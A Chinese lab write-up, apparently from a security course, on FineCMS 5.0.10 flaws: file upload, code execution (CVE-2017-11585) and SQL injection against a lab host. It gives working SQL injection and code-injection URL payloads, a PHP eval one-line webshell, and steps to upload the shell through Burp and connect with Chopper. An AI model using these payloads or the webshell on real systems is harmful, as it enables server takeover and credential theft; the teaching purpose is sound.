FineCMS 5 0 10漏洞集合

蔚落 2022-04-16 02:06 316阅读 0赞

**分享一下我老师大神的人工智能教程！零基础，通俗易懂！[http://blog.csdn.net/jiangjunshow][http_blog.csdn.net_jiangjunshow]**

**也欢迎大家转载本篇文章。分享知识，造福人民，实现我们中华民族伟大复兴！**

笔记地址： [https://www.ichunqiu.com/course/59007][https_www.ichunqiu.com_course_59007]  
操作机：  
Windows xp  
IP:172.16.11.2

目标机：  
Windows xp  
IP:172.16.12.2

**实验目的：**  
学习漏洞产生的原理  
学习如何对此漏洞进行利用修复

**实验内容：**  
FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10版本存在任意文件上传（SSV-93211）,任意代码执行（CVE-2017-11585）漏洞以及SQL注入漏洞。

其中任意文件上传漏洞在上传用户头像处，可通过上传一句话木马，修改数据包内容，获取网站Shell。任意代码执行可利用漏洞，构造Payload执行任意代码，而SQL注入漏洞则可以通过注入获取到管理员的账号密码。此次FineCMS 5.0.10漏洞集合，危害巨大，将直接威胁到服务器的安全。

影响版本  
FineCMSV5.0.10

**实验步骤**  
步骤1：分别了解漏洞产生原理  
第一：文件上传漏洞  
漏洞代码位于/finecms/dayrui/controllers/member/Account.php 177~244，具体是在用户头像上传的地方，核心代码如下：  
![这里写图片描述][SouthEast]  
![这里写图片描述][SouthEast 1]  
![这里写图片描述][SouthEast 2]  
如上，代码仅判断了是否是图片类型，这个判断很容易绕过，只需使用抓包工具修改即可。

第二：sql注入漏洞  
漏洞代码位于/finecms/dayrui/controllers/Api.php中的data2()函数，  
![这里写图片描述][SouthEast 3]  
![这里写图片描述][SouthEast 4]  
![这里写图片描述][SouthEast 5]  
这个函数可以调用到其他的敏感函数，函数传入的参数进入了this->template->list\_tag($param)，正常来说系统封装的函数是用户不能调用的，但这里用户可以调用data函数，我们继续追踪，查看/finecms/dayrui/libraries/Template.php，代码如下：  
![这里写图片描述][SouthEast 6]  
![这里写图片描述][SouthEast 7]  
![这里写图片描述][SouthEast 8]  
![这里写图片描述][SouthEast 9]  
![这里写图片描述][SouthEast 10]  
![这里写图片描述][SouthEast 11]  
如上，将Sql语句处理后赋值给sql变量，最终直接执行。  
构造Payload如下：  
重要代码：  
**sql注入代码：**

index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=action=sql sql='select user();'
      
       
        1

![这里写图片描述][SouthEast 12]  
第三：代码执行漏洞  
**上传代码：**

index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=action=cache name=MEMBER.1'];phpinfo();$a=['1
      
       
        1

![这里写图片描述][SouthEast 13]  
**步骤二：（建议直接使用漏洞）**  
**top one：（1、访问网址，注册账号）**  
首先登陆目标网址：172.16.12.2，注册账号：user1 密码：user1  
文件上传已知在头像上传处，我们使用账号密码为user1 user1来登陆，在会员中心->上传头像上传文件。  
**top two:上传木马，将木马传到服务器上**  
登陆之后在桌面创建文件1.txt，写入一句话木马：

<?php eval($_POST["a"]);?>其中的a为使用菜刀软件的密码
      
       
        1 
        2

然后将名称修改为1.png,接下来点击上传头像。  
在上传之前，我们需要设置浏览器代理，这样才能抓取到数据包：依次点击设置->高级->网络->设置，将代理设置为127.0.0.1：8080，并打开BurpSuite。  
![这里写图片描述][SouthEast 14]  
我们将png修改为php，点击Foward放行。这里如果报错，无需理会。  
上传木马文件目的是  
**top three:菜刀连接访问**  
通过查看CMS框架，可以知道上传文件存储于uploadfile\\member\\3下  
使用**菜刀软件**可以直接访问：[http://172.16.12.2/uploadfile/member/3/0x0.php][http_172.16.12.2_uploadfile_member_3_0x0.php] (木马路径), 其中末尾的.php为一个木马文件，密码为‘a’  
![这里写图片描述][SouthEast 15]  
进入服务器后台，可以直接查看到flag.txt  
![这里写图片描述][SouthEast 16]  
**top four:sql注入漏洞：查找后台管理员账号密码**   
![这里写图片描述][SouthEast 17]  
**top five:上传代码**  
![这里写图片描述][SouthEast 18]

#### 给我老师的人工智能教程打call！[http://blog.csdn.net/jiangjunshow][http_blog.csdn.net_jiangjunshow] ####

![这里写图片描述][SouthEast 19]

[http_blog.csdn.net_jiangjunshow]: https://blog.csdn.net/jiangjunshow/article/details/77338485
[https_www.ichunqiu.com_course_59007]: https://www.ichunqiu.com/course/59007
[SouthEast]: /images/20220416/79afe19983024fcb993f5c5ef5b5ea8b.png
[SouthEast 1]: /images/20220416/56ed95fc021b4787a1313a454e83033a.png
[SouthEast 2]: /images/20220416/9b02f43c1087436f930e71a6821c4cb6.png
[SouthEast 3]: /images/20220416/ec8e418c9aa64d55bcfbe6f395539366.png
[SouthEast 4]: /images/20220416/738697f476494010960ad197a1324f0a.png
[SouthEast 5]: /images/20220416/36239f740d7a4fb7a2334cccd2a362f3.png
[SouthEast 6]: /images/20220416/679c1cbe9e7844788fc44408bd031b55.png
[SouthEast 7]: /images/20220416/feead0d8085c4730bed6f228b205619e.png
[SouthEast 8]: /images/20220416/67edba04610f41d2b820df2791e4ec23.png
[SouthEast 9]: /images/20220416/4e1541f325304c778662c3bcea306585.png
[SouthEast 10]: /images/20220416/414a3996834f4dd3b93b3814dc725c0b.png
[SouthEast 11]: /images/20220416/cb8ec344ed9c481b9755b808707d8725.png
[SouthEast 12]: /images/20220416/2b7b2964a5bc431f8894f766c9b0a0ae.png
[SouthEast 13]: /images/20220416/be9de69f12b149aa933f3b42773ebfe2.png
[SouthEast 14]: /images/20220416/2cb9be1b3f8543ff9e50a3741fec9d28.png
[http_172.16.12.2_uploadfile_member_3_0x0.php]: http://172.16.12.2/uploadfile/member/3/0x0.php
[SouthEast 15]: /images/20220416/d5efeb9d3fee4608bef922683f7e43a3.png
[SouthEast 16]: /images/20220416/6a403ab68eba492f86121d77032364a5.png
[SouthEast 17]: /images/20220416/5c4b569ad8c6497aaa1dc662c9d6b041.png
[SouthEast 18]: /images/20220416/01f48d7035014eccabf7ba596d1bb698.png
[SouthEast 19]: /images/20220416/b3709db0bbba48c7b39d8d372e5d6744.png